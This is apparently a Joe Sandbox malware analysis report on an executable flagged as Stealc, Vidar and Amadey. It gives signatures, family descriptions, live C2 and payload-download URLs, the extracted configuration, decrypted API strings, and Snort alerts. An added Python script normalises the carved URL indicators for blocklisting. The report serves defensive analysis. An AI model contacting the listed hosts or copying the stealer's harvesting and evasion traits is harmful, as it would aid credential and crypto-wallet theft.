Windows Analysis Report
ukuWaeRgPR.exe

Overview

General Information

Sample name: ukuWaeRgPR.exe
renamed because original name is a hash value
Original sample name: 370e9decc41c2ed09ec8f40262b9e2f9.exe
Analysis ID: 1463763
MD5: 370e9decc41c2ed09ec8f40262b9e2f9
SHA1: 2d5753cb4b20e5ce6822ef8b96f8cbb38b2b393a
SHA256: 43d717f6aa2a1ae8bef569917f6ccb5adfd8bb965114196cc715d30e355268b4
Tags: 32, exe, Stealc, trojan

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls it for orders. Its main functionality is loading other payloads (called "tasks") onto all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: ukuWaeRgPR.exe Avira: detected
Source: http://85.28.47.4/a81-46d0-b6b6-535557bcc5fapN9U Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/nss3.dllT Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php:9y Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php) Avira URL Cloud: Label: malware
Source: http://85.28.47.4/pl Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe50673b5d7 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.php1 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpC9B Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll$ Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exephprefoxox Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exera Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/20475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpi94 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dlll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpFl Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exepData Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dlly Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllc Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exeH Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe50673 Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: 00000000.00000002.2171110129.0000000001FEE000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.2820.13.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe ReversingLabs: Detection: 47%
Source: ukuWaeRgPR.exe ReversingLabs: Detection: 47%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Joe Sandbox ML: detected
Source: ukuWaeRgPR.exe Joe Sandbox ML: detected
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetProcAddress
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: lstrcatA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: OpenEventA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CreateEventA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CloseHandle
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: Sleep
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: VirtualFree
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: HeapAlloc
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: lstrcpyA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: lstrlenA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: ExitProcess
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetSystemTime
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: advapi32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: gdi32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: user32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: crypt32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: ntdll.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetUserNameA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CreateDCA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: ReleaseDC
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: sscanf
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: VMwareVMware
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: HAL9TH
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: JohnDoe
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: DISPLAY
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: http://85.28.47.4
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: default
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GlobalLock
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: HeapFree
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetFileSize
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GlobalSize
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: IsWow64Process
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: Process32Next
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetLocalTime
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: FreeLibrary
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: Process32First
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: DeleteFileA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: FindNextFileA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: LocalFree
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: FindClose
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: LocalAlloc
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: ReadFile
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: SetFilePointer
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: WriteFile
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CreateFileA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CopyFileA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: VirtualProtect
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetLastError
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: lstrcpynA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GlobalFree
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: OpenProcess
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: TerminateProcess
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: ole32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: wininet.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: shell32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: psapi.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: SelectObject
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: BitBlt
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: DeleteObject
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C326C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C326C80
Source: ukuWaeRgPR.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: ukuWaeRgPR.exe, 00000000.00000002.2210447818.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: ukuWaeRgPR.exe, 00000000.00000002.2210447818.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
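The "Avira URL Cloud" lines in this section are strings carved out of process memory, which is why many carry trailing garbage ("nss3.dllT", "920475a59bac849d.php:9y", "random.exe50673b5d7") or are cut short ("20475a59bac849d.php" is missing its leading "9"). Fed unchanged into a blocklist they become dozens of near-duplicate, partly wrong indicators. The script below is an added example, not part of the Joe Sandbox report and not code from any of the families named in it: it trims each carved URL at the first file extension a stealer or loader is expected to request (the extension set is an assumption), de-duplicates, labels the role of each clean URL, and flags fragments whose path is a suffix of a longer path on the same host. The input list is copied verbatim from the report lines above.

```python
"""Normalise URL indicators carved from process memory (added example)."""
import re
from urllib.parse import urlsplit

# Anything after the first ".exe", ".dll" or ".php" in the path is treated as
# carve garbage. Assumption: these are the only extensions this sample fetches.
_EXT = re.compile(r"\.(exe|dll|php)", re.IGNORECASE)
ROLE = {"php": "c2-script", "exe": "payload", "dll": "helper-dll"}

# Carved URLs copied verbatim from the AV Detection section of the report.
CARVED = """
http://85.28.47.4/a81-46d0-b6b6-535557bcc5fapN9U
http://77.91.77.81/mine/amadka.exe
http://85.28.47.4/
http://77.91.77.81/cost/go.exe
http://85.28.47.4/69934896f997d5bb/nss3.dllT
http://85.28.47.4/920475a59bac849d.php:9y
http://85.28.47.4/920475a59bac849d.php)
http://85.28.47.4/pl
http://77.91.77.82/Hun4Ko/index.php
http://77.91.77.81/stealc/random.exe50673b5d7
http://85.28.47.4/920475a59bac849d.php1
http://85.28.47.4/69934896f997d5bb/softokn3.dll
http://85.28.47.4/920475a59bac849d.phpC9B
http://85.28.47.4/69934896f997d5bb/softokn3.dll$
http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
http://77.91.77.81/mine/amadka.exephprefoxox
http://77.91.77.81/mine/amadka.exera
http://85.28.47.4/69934896f997d5bb/mozglue.dll
http://85.28.47.4/20475a59bac849d.php
http://85.28.47.4/920475a59bac849d.phpi94
http://85.28.47.4/69934896f997d5bb/nss3.dll
http://85.28.47.4/69934896f997d5bb/mozglue.dlll
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
http://85.28.47.4/920475a59bac849d.phpFl
http://77.91.77.81/mine/amadka.exe00
http://85.28.47.4/69934896f997d5bb/freebl3.dll
http://85.28.47.4/920475a59bac849d.php
http://77.91.77.81/cost/go.exepData
http://85.28.47.4/69934896f997d5bb/freebl3.dlly
http://85.28.47.4/69934896f997d5bb/sqlite3.dll
http://77.91.77.81/stealc/random.exe
http://77.91.77.81/cost/go.exe00
http://85.28.47.4/69934896f997d5bb/sqlite3.dllc
http://85.28.47.4/69934896f997d5bb/msvcp140.dll
http://85.28.47.4
http://77.91.77.81/stealc/random.exeH
http://77.91.77.81/stealc/random.exe50673
""".split()


def trim_carved(url: str) -> str:
    """Cut a carved URL back to scheme://host/path-up-to-first-extension."""
    parts = urlsplit(url.strip())
    path = parts.path or "/"          # bare host and host/ collapse to one IOC
    m = _EXT.search(path)
    if m:
        path = path[: m.end()]        # drop ":9y", "T", "50673b5d7", a second path ...
    return f"{parts.scheme}://{parts.netloc}{path}"


def classify(clean: str) -> str:
    """Role of a clean URL by its extension; no extension means unknown."""
    m = _EXT.search(urlsplit(clean).path)
    return ROLE[m.group(1).lower()] if m else "other"


def find_truncated(urls) -> set:
    """URLs whose path is a proper suffix of another path on the same host
    (a carve that lost its leading bytes), e.g. /20475a59bac849d.php."""
    by_host: dict = {}
    for u in urls:
        p = urlsplit(u)
        by_host.setdefault(p.netloc, []).append(p.path)
    flagged = set()
    for u in urls:
        p = urlsplit(u)
        if len(p.path) > 1 and any(o != p.path and o.endswith(p.path[1:])
                                   for o in by_host[p.netloc]):
            flagged.add(u)
    return flagged


def normalize(carved) -> dict:
    """Map each de-duplicated clean URL to its role."""
    clean = sorted({trim_carved(u) for u in carved})
    truncated = find_truncated(clean)
    return {u: ("truncated-fragment" if u in truncated else classify(u)) for u in clean}


if __name__ == "__main__":
    for url, role in normalize(CARVED).items():
        print(f"{role:<18} {url}")
```

The 37 carved strings collapse to 16 indicators: one C2 script on 85.28.47.4, seven helper DLLs under /69934896f997d5bb/ (matching the seven DLLs Malpedia lists for Stealc), three payload URLs on 77.91.77.81, the Amadey check-in on 77.91.77.82, one truncated fragment, and three paths with no extension that need a human look. The doubled Amadey path ("/Hun4Ko/index.php/Hun4Ko/index.php") is deliberately folded into the single script URL; keep the raw form if you want to match exactly what the loader sends.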

Networking

Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49705 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49705 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.5:49705
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49705 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.5:49705
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49720 -> 77.91.77.82:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 77.91.77.82:80 -> 192.168.2.5:49720
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:25:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 